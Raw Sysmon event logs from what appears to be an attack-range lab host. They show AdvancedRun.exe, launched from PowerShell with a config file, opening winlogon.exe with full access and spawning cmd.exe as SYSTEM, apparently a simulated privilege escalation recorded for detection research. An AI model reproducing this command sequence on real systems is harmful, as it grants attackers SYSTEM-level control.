18:41:37.710{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft 
Corporationbcryptprimitives.dllMD5=6215B591FCA75825262B29613A48836C,SHA256=B34EED73CE76E4AA1A0812E9BE1AE093549B164341F988CA877E27E545C3C1B8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004009334Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.710{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004009333Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.710{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\comdlg32.dll10.0.14393.4283 (rs1_release.210303-1802)Common Dialogs DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcomdlg32.dllMD5=A7152A41A642F6976B4226FA6A22F48D,SHA256=2DBDB16F905A9150669B9017D5C4A0AE75DBB6E52298F0FEFE1849C3FC5D9909trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004009332Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.710{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sspicli.dll10.0.14393.4704 (rs1_release.211004-1917)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecurity.dllMD5=CF0985D6545196D0EBDCB6C2630BBDC1,SHA256=1990B384CE1E1809B90D617506DEF24E654CE7A4E93C5BDCD718DED2ECCC53A8trueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000004009331Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.710{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=CA6447DDCA724F0C5C0CAFDE184EFE64,SHA256=F9664337B60A332571FCA81CC3E6DD194DCE20C8546980FD283CA892D0CC873CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004009330Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.710{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32full.dll10.0.14393.4886 (rs1_release.220104-1735)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=AB5AE3CC1EAA79B84589257A14BC2480,SHA256=BD0216233D84012BD61BE38964798F8F6686DA61E2E8E04D1B395AB8566CA084trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004009329Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.710{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\rpcrt4.dll10.0.14393.4886 (rs1_release.220104-1735)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=8F533DC30B7304908AD1430FA64A8D05,SHA256=04FF1C778A63457B291BFD40C0A782A13E0D87E32707FA4BAEC728847299776CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004009328Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.710{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ucrtbase.dll10.0.14393.3659 
(rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=F058FE3C5E3DEF875A654A18551D88E5,SHA256=78DC0394AA359DBD2EB8BE7F13FEDF0478C8AA55785712B358FAC1C97D051B87trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004009327Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.710{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=E9E209227AF7EFBFDAAA0B932251486D,SHA256=639DD063669F506790DA8C940E3BEBE4F7CF31668260F94CF5A67C93021D2BDFtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004009326Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.710{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\combase.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=55DECBF64D495E410E82FD446739CA2B,SHA256=B1D480739AB21426FF289E043F9751849BEBA477F3C9E88E5F21F96E16A9B1B0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004009325Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.710{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\userenv.dll10.0.14393.4583 (rs1_release.210730-1850)UserenvMicrosoft® Windows® Operating SystemMicrosoft Corporationuserenv.dllMD5=53FEB2DF5A3001CEE00158E46CF1F1C2,SHA256=9D4DC493975065C4595DB62DCB0828631D9CF6019C9A82AA0384D65A8E6A62C7trueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000004009324Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.710{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=181FE38C3FE164FBFC1A5A8399CCC2DA,SHA256=233C31D9FC1C50A3E0688C1E778D356B419ED4A70D7B6870CA7631E4FE5C2AF9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004009323Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.710{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=AF2A9437F3AED2E8254B7E1EB6E96782,SHA256=D8F3C957BDBD9DB510E71B07CDE1B446491D4DC520787548060B3AAD1324C62AtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004009322Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.710{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_c58df2c997bddaf8\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=9BA49461346F5B2DAFE81E401E884241,SHA256=297B46C95521B8EB59B3793F0ED2736F39C495D2C3D622638EE9205F53E69EFDtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004009321Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:41:37.710{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=318804DFF282AE5C2FEF5577057CB913,SHA256=A65C5C3F38A793F0C59C1A4553940D6D236CE2BC3380898E865BF0E1F80FEE8CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004009320Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.710{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=F3B7F231407DD207CABC94C9347984AC,SHA256=053A1D95EEB426416278D2AD7D584FDD984A8B445CC88B46785AB8666383FB0BtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004009319Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.710{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\KernelBase.dll10.0.14393.4886 (rs1_release.220104-1735)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=4AA859ECE1E241F213E977FB1FC58E4F,SHA256=E6E772658EFC1276B673EA096F76B1ED8E0013C9DD81FEBA76C042E08FA6AC31trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004009318Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.710{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft 
Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004009317Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.710{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64cpu.dll10.0.14393.3503 (rs1_release.200131-0410)AMD64 Wow64 CPU Microsoft® Windows® Operating SystemMicrosoft Corporationwow64cpu.dllMD5=C1F2078639481364EA3FDD10CBEB1A18,SHA256=B63E6DC0B3D7ABA9CB95929A1A360208A570CB2072474276F649B68F1AC8DC82trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004009316Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.710{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004009315Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.710{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000004009314Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.710{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004009313Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.710{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004009312Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.710{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64win.dll10.0.14393.3383 (rs1_release.191125-1816)Wow64 Console and Win32 API LoggingMicrosoft® Windows® Operating SystemMicrosoft Corporationwow64lg2.dllMD5=62DEBA17D0A26B352F1C3F02144BC6EA,SHA256=5A1C08FE318942CB31048DBD641E25610DE842E34470B3E54FEDCA4E2642D4E0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004009311Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:41:37.710{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64.dll10.0.14393.3503 (rs1_release.200131-0410)Win32 Emulation on NT64Microsoft® Windows® Operating SystemMicrosoft Corporationwow64.dllMD5=447615F19DAAFF9C308370C59F493BF8,SHA256=45ED2009CEEB249BBF518B958AF02B97E667DB68C9B6D65642E69E9B0300CF5DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004009310Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.710{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F77A39FFEEFDA237A5730A71A2EB3B83,SHA256=A4D72013A219DA259858A19C3A2807FF88C1E874621AEF666D05C65E9257C9B3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004009309Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.710{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F0A74A939E7B2E1C0B392CEB2D3EB71B,SHA256=CD6382FF8FDEF8C08C62576D80C981E6E1C966E95874007EFE047BD136BF954CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004009308Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.710{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you 
choose.AdvancedRunNirSoftAdvancedRun.exeMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8trueNir SoferValidATTACKRANGE\Administrator 10341000x80000000000000004009307Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.710{834264DD-DAF8-61EA-5B00-000000002702}41004280C:\Windows\system32\csrss.exe{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004009306Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.694{834264DD-E497-61EA-F301-000000002702}9444688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+15c0099|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\Nati
veImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a459b1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a366d1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43c13|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43785|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a283d8|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a2794aATTACKR
ANGE\AdministratorATTACKRANGE\Administrator 154100x80000000000000004009305Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.707{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /cfg C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.cfg /runC:\Users\Administrator\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 534500x80000000000000004008732Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:46.644{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeATTACKRANGE\Administrator 154100x80000000000000004008621Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:45.349{834264DD-FE2D-61EA-AF05-000000002702}5296C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\System32\cmd.exe"C:\Windows\System32\NT AUTHORITY\SYSTEM{834264DD-DAE4-61EA-E703-000000000000}0x3e72SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /cfg 
C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.cfgATTACKRANGE\Administrator 10341000x80000000000000004008620Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:45.347{834264DD-DAE7-61EA-1700-000000002702}13002268C:\Windows\System32\svchost.exe{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\seclogon.dll+1404|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004008619Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:45.347{834264DD-DAE7-61EA-1700-000000002702}13002268C:\Windows\System32\svchost.exe{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x14c0C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\seclogon.dll+128d|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004008618Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21f3|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21bd|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004008617Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 